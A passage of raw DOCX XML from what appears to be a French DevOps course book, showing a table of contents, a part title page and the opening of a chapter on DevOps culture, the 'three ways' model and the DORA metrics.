        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>93.6 Jalon 4 — Le déploiement convergent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>813</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>93.7 Jalon 5 — Secrets et sécurité</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>814</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>93.8 Jalon 6 — Observabilité et exploitation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>814</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:sectPr>
          <w:headerReference w:type="default" r:id="rId82"/>
          <w:footerReference w:type="default" r:id="rId83"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1474" w:right="1361" w:bottom="1361" w:left="1531" w:header="709" w:footer="652" w:gutter="0"/>
          <w:cols w:space="720"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9014"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="11679" w:hRule="exact"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9240"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0F2E4C"/>
            <w:tcMar>
              <w:top w:w="800" w:type="dxa"/>
              <w:left w:w="680" w:type="dxa"/>
              <w:bottom w:w="800" w:type="dxa"/>
              <w:right w:w="680" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="E0A21B"/>
                <w:sz w:val="20"/>
                <w:spacing w:val="60"/>
              </w:rPr>
              <w:t>PARTIE I</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TitrePartie"/>
              <w:spacing w:before="0" w:after="160" w:line="680" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="56"/>
              </w:rPr>
              <w:t>Culture DevOps et systèmes</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="16" w:space="1" w:color="E0A21B"/>
              </w:pBdr>
              <w:spacing w:before="0" w:after="200"/>
            </w:pPr>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="80" w:after="280" w:line="330" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="D6E1EB"/>
                <w:sz w:val="23"/>
              </w:rPr>
              <w:t>Comprendre la culture, mesurer la performance, maîtriser Linux, le shell, les éditeurs et Git.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="250" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="E0A21B"/>
                <w:sz w:val="16"/>
                <w:spacing w:val="40"/>
              </w:rPr>
              <w:t>CHAPITRES</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:line="270" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="C9D6E2"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>46. La culture DevOps et ses métriques · 47. Linux : système de fichiers, processus et droits · 48. Le terminal au quotidien · 49. Scripts shell et automatisation · 50. Git avancé : branches, rebasage et récupération · 51. Forges, revues et collaboration · 52. Provisionner une machine et gérer ses paquets · 53. Environnements, secrets et configuration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>46. La culture DevOps et ses métriques</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="40" w:after="200" w:line="372" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Pourquoi développement et exploitation se sont rapprochés, et comment mesurer honnêtement la performance d'une équipe.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Durée de travail : 2 h 45 · Niveau : Débutant · Prérequis : aucun</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Expliquer ce que le DevOps résout, et ce qu'il ne résout pas.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Distinguer les quatre métriques DORA et leur usage.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Situer les rôles de développement, d'exploitation et de fiabilité.</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Reconnaître les anti-patrons d'organisation.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Choisir un premier chantier d'amélioration mesurable.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>46.1 Le problème d'origine</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Dans une organisation classique, une équipe écrit le logiciel et une autre l'exploite. La première est récompensée pour livrer vite, la seconde pour ne rien casser. Les deux optimisent des objectifs opposés, et le conflit est structurel, pas humain.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="120" w:after="0" w:line="20" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="2667000"/>
            <wp:docPr id="56" name="Picture 56"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c00_f54.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId86"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="2667000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 0.54 — Deux organisations, deux effets</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.158 — Cinq symptômes et leurs causes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95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Symptôme</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="323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Cause organisationnelle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="281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Conséquence</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2958"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Livraisons trimestrielles</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3239"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Tests manuels longs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2817"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Changements massifs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="295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 Ça marche chez moi »</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="323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Environnements différents</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="281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Incidents en production</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2958"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Personne ne sait déployer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3239"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Connaissance tacite</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2817"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Dépendance à une personne</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="295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Peur du déploiement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="323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Absence de retour arrière</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="281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Décisions lentes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2958"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Incidents répétés</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3239"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Aucune analyse post-mortem</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2817"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Mêmes pannes</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DEVOPS</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Ensemble de pratiques culturelles et techniques qui réduisent le délai entre une idée et sa mise en production, tout en augmentant la fiabilité. Ce n'est ni un poste ni un outil.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>46.2 Trois voies</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le modèle des « trois voies » décrit les flux de valeur d'une organisation technique. Il sert de grille de lecture plus que de méthode prescriptive.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.159 — Trois voies et leurs pratiques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11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Voie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="338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Principe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="352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Pratiques</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2113"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Flux</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3380"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Accélérer le passage du développement à la production</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3521"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Petits lots, automatisation, intégration continue</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="211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Rétroaction</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="338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Raccourcir la boucle d'information</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="352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Supervision, tests en production, revues</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2113"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Apprentissage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3380"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Cultiver l'expérimentation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3521"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Post-mortems sans blâme, entraînement, kata</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La première voie sans la seconde produit des livraisons rapides et fragiles. La seconde sans la première produit une organisation qui comprend ses pannes mais ne livre pas. Les trois se tiennent.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>46.3 Les quatre métriques DORA</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Quatre indicateurs, issus de plusieurs années d'études, décrivent la performance de livraison sans mesurer les individus.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.160 — Quatre métriques et leurs ordres de grandeur</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Métrique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="386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Définition</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="214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Bon ordre de grandeur</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Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Fréquence de déploiement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3863"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Nombre de mises en production par période</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
